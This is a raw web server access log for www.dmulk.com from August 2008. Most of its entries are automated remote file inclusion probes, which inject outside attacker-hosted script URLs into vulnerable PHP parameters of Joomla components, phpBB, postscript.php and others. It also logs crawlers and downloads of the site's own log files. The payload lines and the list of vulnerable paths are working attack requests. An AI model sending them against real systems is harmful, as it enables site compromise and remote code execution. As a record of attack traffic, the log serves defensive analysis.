77.90.20.2 - - [07/Aug/2008:12:58:09 -0700] "GET /logs/index.php?x=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:58:09 -0700] "GET /logs/access_080215.log/index.php?x=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:58:11 -0700] "GET /index.php?x=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18435 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:12:58:26 -0700] "GET /logs/access_080308.log%20/index.php?side=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:12:58:27 -0700] "GET /index.php?side=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18441 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:12:58:28 -0700] "GET /logs/index.php?side=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:58:36 -0700] "GET /index.php?x=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18435 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [07/Aug/2008:12:59:09 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [07/Aug/2008:12:59:10 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:59:15 -0700] "GET /logs/index.php?place=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:59:17 -0700] "GET /index.php?place=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18443 "-" "libwww-perl/5.805" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:59:20 -0700] "GET /logs/htmltonuke.php?filnavn=http://espacioboricua.com//ray/modules/global/inc/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:59:20 -0700] "GET /htmltonuke.php?filnavn=http://espacioboricua.com//ray/modules/global/inc/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.79.163.142 - - [07/Aug/2008:12:59:23 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.142 - - [07/Aug/2008:12:59:23 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.142 - - [07/Aug/2008:12:59:23 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:59:37 -0700] "GET /logs/postscript.php?p_mode=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:12:59:38 -0700] "GET /postscript.php?p_mode=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:59:57 -0700] "GET /logs//components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:59:57 -0700] "GET //components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:13:00:31 -0700] "GET /index.php?view=page&pagename=http://bloggreenwood.com/v6id.txt???? HTTP/1.1" 200 5829 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:13:00:36 -0700] "GET /logs/access_080318.log/index.php?view=page&pagename=http://bloggreenwood.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:13:00:44 -0700] "GET //index2.php?option=com_content&task=§ionid=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:13:00:45 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:13:00:53 -0700] "GET /logs/postscript.php?p_mode=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:13:00:59 -0700] "GET /postscript.php?p_mode=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:13:02:11 -0700] "GET /logs/access_080226.log/index.php?go=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:13:02:15 -0700] "GET /logs/index.php?go=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:13:02:16 -0700] "GET /index.php?go=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18437 "-" "libwww-perl/5.803" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:13:03:20 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:13:03:21 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:13:03:21 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:13:03:52 -0700] "GET /logs/access_080302.log/postscript.php?p_mode=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:13:04:15 -0700] "GET /logs/access_080110.log/htmltonuke.php?filnavn=http://espacioboricua.com//ray/modules/global/inc/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:13:04:15 -0700] "GET /htmltonuke.php?filnavn=http://espacioboricua.com//ray/modules/global/inc/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:13:04:16 -0700] "GET /logs/htmltonuke.php?filnavn=http://espacioboricua.com//ray/modules/global/inc/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.193.81 - - [07/Aug/2008:13:04:25 -0700] "GET /logs/access_080114.log//claroline/phpbb/page_tail.php?includePath=http://alternate-zone.com/themes/Sage/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [07/Aug/2008:13:04:25 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://alternate-zone.com/themes/Sage/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [07/Aug/2008:13:04:25 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://alternate-zone.com/themes/Sage/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.60.155.3 - - [07/Aug/2008:13:04:41 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 200 59573 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
211.60.155.3 - - [07/Aug/2008:13:04:41 -0700] "GET //?path%5Bdocroot%5D=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 200 18461 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
77.221.130.6 - - [07/Aug/2008:13:04:52 -0700] "GET /logs/access_080120.log/postscript.php?p_mode=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:13:04:58 -0700] "GET /logs/access_080308.log/index.php?side=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:13:04:58 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:13:04:59 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:13:05:02 -0700] "GET /logs/access_080303.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.65.122.125 - - [07/Aug/2008:13:05:10 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:13:05:14 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:13:05:14 -0700] "GET /logs/access_080218.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
205.234.193.81 - - [07/Aug/2008:13:05:28 -0700] "GET /logs/access_080125.log//claroline/phpbb/page_tail.php?includePath=http://alternate-zone.com/themes/Sage/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:13:05:37 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:13:05:37 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:13:05:38 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.13.208.161 - - [07/Aug/2008:13:05:46 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:13:05:48 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:13:05:51 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:13:05:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.93.102.243 - - [07/Aug/2008:13:05:58 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
201.59.146.243 - - [07/Aug/2008:13:06:04 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
82.215.162.43 - - [07/Aug/2008:13:06:09 -0700] "GET /logs/modules/projects/vw_files.php?dPconfig[root_dir]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.226.85.218 - - [07/Aug/2008:13:06:37 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 622413 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
84.16.235.79 - - [07/Aug/2008:13:07:20 -0700] "GET /logs/access_080220.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
203.158.221.227 - - [07/Aug/2008:13:07:23 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
209.47.162.29 - - [07/Aug/2008:13:07:34 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:13:07:38 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.13.243.62 - - [07/Aug/2008:13:08:07 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 274944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.195.37.125 - - [07/Aug/2008:13:08:44 -0700] "GET /blog/wp-includes/js/ HTTP/1.0" 200 2924 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [07/Aug/2008:13:08:45 -0700] "GET /blog/wp-includes/bookmark-template.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [07/Aug/2008:13:08:45 -0700] "GET /blog/wp-includes/feed.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
70.84.182.98 - - [07/Aug/2008:13:08:46 -0700] "GET /classes/core/language.php?rootdir=http://www.daviskoreanchurch.org/bbs/skin/zero_vote/images/s.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.84.182.98 - - [07/Aug/2008:13:08:46 -0700] "GET /classes/core/language.php?rootdir=http://soft.msmen.com/skins/blue/compile/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
70.84.182.98 - - [07/Aug/2008:13:08:46 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.daviskoreanchurch.org/bbs/skin/zero_vote/images/s.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
70.84.182.98 - - [07/Aug/2008:13:08:47 -0700] "GET /logs/classes/core/language.php?rootdir=http://soft.msmen.com/skins/blue/compile/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:13:09:03 -0700] "GET /logs/access_080216.log//oneadmin/config.php?path[docroot]=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:13:09:04 -0700] "GET //oneadmin/config.php?path[docroot]=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:13:09:04 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:13:09:50 -0700] "GET //oneadmin/config.php?path[docroot]=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:13:10:00 -0700] "GET /logs/access_080316.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:13:10:08 -0700] "GET /logs//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 59573 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:13:10:13 -0700] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 18373 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.88.11 - - [07/Aug/2008:13:10:17 -0700] "GET /phphtml.php?htmlclass_path=http://soft.msmen.com/skins/blue/compile/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.214.88.11 - - [07/Aug/2008:13:10:18 -0700] "GET /logs/phphtml.php?htmlclass_path=http://soft.msmen.com/skins/blue/compile/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
72.52.214.245 - - [07/Aug/2008:13:10:31 -0700] "GET /logs/access_080302.log//postscript.php?p_mode=http://www.freewebtown.com/elitewa/22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.52.214.245 - - [07/Aug/2008:13:10:31 -0700] "GET //postscript.php?p_mode=http://www.freewebtown.com/elitewa/22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:13:10:33 -0700] "GET /logs//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 59573 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:13:10:34 -0700] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 18373 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:13:10:37 -0700] "GET /logs//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 59573 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:13:10:38 -0700] "GET /logs//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 59573 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:13:10:38 -0700] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 18357 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:13:10:40 -0700] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 18373 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:13:10:44 -0700] "GET /logs/access_080115.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:13:10:45 -0700] "GET /logs/access_080115.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:13:10:45 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:13:10:45 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:13:10:46 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:13:10:46 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
72.52.214.245 - - [07/Aug/2008:13:10:51 -0700] "GET /logs/access_080120.log//postscript.php?p_mode=http://www.freewebtown.com/elitewa/22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:13:10:53 -0700] "GET /logs/access_071213.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [07/Aug/2008:13:11:59 -0700] "GET /logs/access_080321.log/index.php?pg=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [07/Aug/2008:13:12:01 -0700] "GET /index.php?pg=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 200 18417 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [07/Aug/2008:13:12:01 -0700] "GET /logs/index.php?pg=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:13:12:08 -0700] "GET /logs/access_071224.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.33.173.20 - - [07/Aug/2008:13:12:17 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:13:12:24 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:13:12:24 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:13:12:50 -0700] "GET /logs/access_080222.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:13:13:20 -0700] "GET /logs/access_080311.log//oneadmin/config.php?path[docroot]=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:13:13:45 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:13:13:46 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:13:13:46 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:13:13:46 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:13:14:16 -0700] "GET /logs/access_080101.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.70.145.159 - - [07/Aug/2008:13:14:17 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:13:14:25 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:13:14:30 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:13:15:21 -0700] "GET /logs/access_080118.log/index.php?url=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:13:15:23 -0700] "GET /index.php?url=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18439 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:13:15:26 -0700] "GET /logs/index.php?url=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.60.155.3 - - [07/Aug/2008:13:15:38 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
211.60.155.3 - - [07/Aug/2008:13:15:38 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:13:16:15 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
